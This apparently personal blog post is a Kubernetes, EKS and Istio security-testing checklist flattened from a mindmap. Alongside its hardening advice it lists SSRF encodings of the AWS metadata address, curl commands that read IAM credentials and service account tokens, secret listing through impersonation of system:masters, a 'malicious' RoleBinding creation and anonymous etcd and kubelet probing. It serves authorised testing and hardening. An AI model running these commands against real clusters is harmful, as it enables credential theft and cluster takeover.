Posts Kubernetes Security Testing Mindmap
Post
Cancel

Kubernetes Security Testing Mindmap

Kubernetes Security Testing Mindmap

Over the past months I’ve been looking at different Kubernetes clusters from different vendors and this mindmap helped me stay organized on what to look for when it comes to security testing.

In the mindmap there’s a section dedicated to AWS and EKS including best practices, plus a Kubernetes section and an Istio section. Treat this mindmap as a checklist of stuff to hunt in the cluster.

Markmap
An example network policy to enable DNS and enforce traffic through egress gateway:
Interesting approach how to configure that: https://monzo.com/blog/controlling-outbound-traffic-from-kubernetes
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)
http://169.254.169.254.xip.io/ DNS Name
http://0251.00376.000251.0000376/ Dotted octal with padding
http://0251.0376.0251.0376/ Dotted octal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0xA9FEA9FE/ Dotless hexadecimal
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://7147006462/ Dotless decimal with overflow
http://2852039166/ Dotless decimal
http://425.510.425.510/ Dotted decimal with overflow
http://[0:0:0:0:0:ffff:169.254.169.254]
http://[::ffff:169.254.169.254]
curl -v -H “Authorization: Bearer <jwt_token>” https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
curl -v -H “Authorization: Bearer <jwt_token>” https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
curl -v -H “Authorization: Bearer <jwt_token>” https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
curl -v -H “Authorization: Bearer <jwt_token>” https://<master_ip>:<port>/api/v1/namespaces/default/pods/
curl -k -v -XGET -H “Authorization: Bearer <JWT TOKEN (of the impersonator)>” -H “Impersonate-Group: system:masters” -H “Impersonate-User: null” -H “Accept: application/json” https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
edit, admin and clusterroles has impersonate
curl -k -v -X POST -H “Authorization: Bearer <JWT TOKEN>” -H “Content-Type: application/json” https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
Attackers who compromised a pod can bypass Envoy and all monitoring that's configured in the pod itself
Is there a network policy configured preventing all egress traffic not coming from the Egress Gateway?
Is there a firewall configured to only allow egress traffic coming from the Egress Gateway?
What are the Gateways configured and Destination rules? kubectl get [Gateway, DestinationRule] -A
What are the service entries configured? kubectl get ServiceEntry -A
Alternative endpoints
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM ROLE>
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
secrets are in /run/secrets/kubernetes.io/
env
K8S Linux Capabilities can be added and dropped using the securityContext
(on your laptop) capsh --decode=0000003fffffffff
cat /proc/<PID>/status | grep -i cap
ps -aef
cap_sys_boot
cap_sys_module
cap_sys_admin
containers should not run as root
List daemonsets
List deployments
List secrets
List pods
curl -k http://<external-IP>:10255/
curl -k http://<external-IP>:10255/metrics
curl -k http://<external-IP>:10255/pods
curl -k https://<IP address>:2379/version
curl -k https://<IP address>:2379
etcdctl –endpoints=http://<MASTER-IP>:2379 get / –prefix –keys-only
Not exposed on EKS
curl -k https://<IP Address>:(8|6)443/api/v1
curl -k https://<IP Address>:(8|6)443/healthz or - curl -k https://<IP Address>:(8|6)443/readyz
curl -k https://<IP Address>:(8|6)443/swaggerapi
/apis/authorization.k8s.io
/apis/apps
/apis
/api
6782-4 - weave (metric and endpoints)
9099 - calico-felix
10256 - kube-proxy
10250, 10255 - kubelet
8080 - insecure kube-apiserver
8443 - Minikube kube-apiserver
6443 - kube-apiserver
4194 - cAdvisor
2379 - etcd
443 - kube-apiserver
Impersonate
Change role-bindings
kubectl node-shell <node> more info
bootstrap-signer service account
Creating pods in kube-system is a no no
Pod creation
Access any resource resources: ["*"] verbs["create"|"list"|"get"]
Listing secrets
https://istio.io/latest/docs/tasks/traffic-management/egress/egress-gateway/
What are the Virtual Services configured? kubectl get VirtualService -A
Is it installed? kubectl get pod -l istio=egressgateway -n istio-system
Are critical services isolated?
Are there any overly broad hosts configurations?
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: "default"
spec:
  mtls:
    mode: STRICT
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: allow-nothing
  namespace: default
spec:
  {}
Check for exposed AWS IAM key
kubectl get svc –all-namespaces
Env and secrets in the container
Linux capabilities
Least Privilege
Kernel exploits
cat /run/secrets/kubernetes.io/serviceaccount/token
Anonymous Kubelet access
Anonymous ETCD access
Anonymous API access
Port Scanning
Privesc
https://github.com/appvia/krane
Build and sign your images
Lint your Dockerfiles
Create a set of curated images (consider creating a set of vetted images for the different application stacks in your organization)
Implement endpoint policies for ECR ( The default endpoint policy for allows access to all ECR repositories within a region)
Consider using ECR private endpoints (The ECR API has a public endpoint)
Create IAM policies for ECR repositories (If different teams don't need to share assets, you may want to create a set of IAM policies that restrict access to the repositories each team can interact with.)
Scan images for vulnerabilities regularly
Create minimal images (Start by removing all extraneous binaries from the container image)
Configure Selinux (https://github.com/containers/container-selinux)
Run Amazon Inspector to assess hosts for exposure, vulnerabilities, and deviations from best practices (Inspector requires the deployment of an agent)
Deploy workers onto private subnets
Minimize access to worker nodes (Instead of enabling SSH access, use SSM Session Manager when you need to remote into a host. https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager.html)
Runtime security (drop linux capabilities / use Pod Security Policies / AppArmor)
Use an external secrets provider (e.g. Hashicorp's Vault)
Use volume mounts instead of environment variables (The values of environment variables can unintentionally appear in logs)
Use separate namespaces as a way to isolate secrets from different applications
Rotate secrets periodically (Kubernetes doesn't automatically rotate secrets)
Audit secrets: use Kubernetes audit log: {(.verb="get") && (.objectRef.resource="secret")}
Use AWS KMS for envelope encryption of Kubernetes secrets.
Rotate your CMKs periodically (Configure KMS to automatically rotate you CMKs)
Encrypt data at rest
Encryption in transit (for HIPAA PCI), use TCL, Service Mesh, Ingress Controllers and Load Balancers
Security group setup (https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html)
Use encryption with AWS load balancers ( alb.ingress.kubernetes.io/certificate-arn --> adds certificates)
Log network traffic metadata (Manuela note: good recommendation but this could get very expensive really quick)
Create a rule to allow DNS queries
Create a default deny policy (network)
Tenant isolation (soft = namespaces or role bindings; Hard = separate clusters )
Disable auto-mounting of service account tokens (If your application doesn't need to call the Kubernetes API set the automountServiceAccountToken attribute to false in the PodSpec: kubectl patch serviceaccount default -p $'automountServiceAccountToken: false')
Scope the IAM Role trust policy for IRSA to the service account name (it's best to make the role trust policy as explicit as possible by including the service account name. This will effectively prevent other Pods within the same Namespace from assuming the role.)
Restrict access to the instance profile assigned to the worker node (the pod can still inherit the rights of the instance profile assigned to the worker node)
Update the aws-node daemonset to use IRSA (default: the aws-node daemonset is configured to use a role assigned to the EC2 instances to assign IPs to pods)
Do not allow privileged escalation (You can prevent a container from using privileged escalation by implementing a pod security policy that sets allowPriviledgedEscalation to false or by setting securityContext.allowPrivilegedEscalation in the podSpec.)
Set requests and limits for each container to avoid resource contention and DoS attacks (The podSpec allows you to specify requests and limits for CPU and memory)
Restrict the use of hostPath or if hostPath is necessary restrict which prefixes can be used and configure the volume as read-only (By default pods that run as root will have write access to the file system exposed by hostPath, to mitigate the risks from hostPath, configure the spec.containers.volumeMounts as readOnly AND use a pod security policy to restrict the directories that can be used by hostPath volumes, see https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation)
Never run Docker in Docker or mount the socket in the container
Grant least privileged access to applications
Run the application as a non-root user (Containers run as root by default, consider adding the spec.securityContext.runAsUser attribute to the PodSpec)
Do not run processes in containers as root ( The Kubernetes podSpec includes a set of fields under spec.securityContext, that allow to let you specify the user and/or group to run your application as)
Scope the binding for privileged pods to service accounts within a particular namespace, e.g. kube-system, and limiting access to that namespace.
Use dedicated service accounts for each application (This applies to service accounts for the Kubernetes API as well as IRSA.)
Pod capabilities
Tenant isolation
Check /var/run/secrets/kubernetes.io/serviceaccount for sa and their permissions
Audit your CloudTrail logs (AWS APIs called by pods that are utilising IAM Roles for Service Accounts (IRSA) are automatically logged to CloudTrail along with the name of the service account.)
Create alarms for suspicious events (use attributes like host, sourceIPs, and k8s_user.username)
Audit logs (https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html#enabling-control-plane-log-export)
Make the EKS Cluster Endpoint private (or public with CIDR blocks whitelisting )
Dedicated IAM role for cluster creation (When you create an Amazon EKS cluster, the IAM entity user or role is automatically granted system:masters permissions in the cluster's RBAC configuration. )
Least privileged access to AWS resources
Don't use a service account token for authentication (A service account token is a long-lived, static credential. If it is compromised, lost, or stolen, an attacker may be able to perform all the actions associated with that token until the service account is deleted)
Egress Gateway
Restrict who can create Gateways
Are there gateways configured?
What authorization policies are configured? kubectl get AuthorizationPolicy
Is mTLS traffic on strict mode?
Is there an allow-nothing authorization policy on each namespace?
kubeaudit all
tar -xf kubeaudit*
Download from releases
kubectl apply -f pentest/kubernetes/templates/kubehunter.yaml
Network Services
Container Security
Endpoints
RBAC configuration
Mutual TLS
Kubeaudit
Kube hunter
EKS
SkyArk powershell module
Istio
K8S
AWS
Kubernetes Security
This post is licensed under CC BY 4.0 by the author.
markmapmarkmap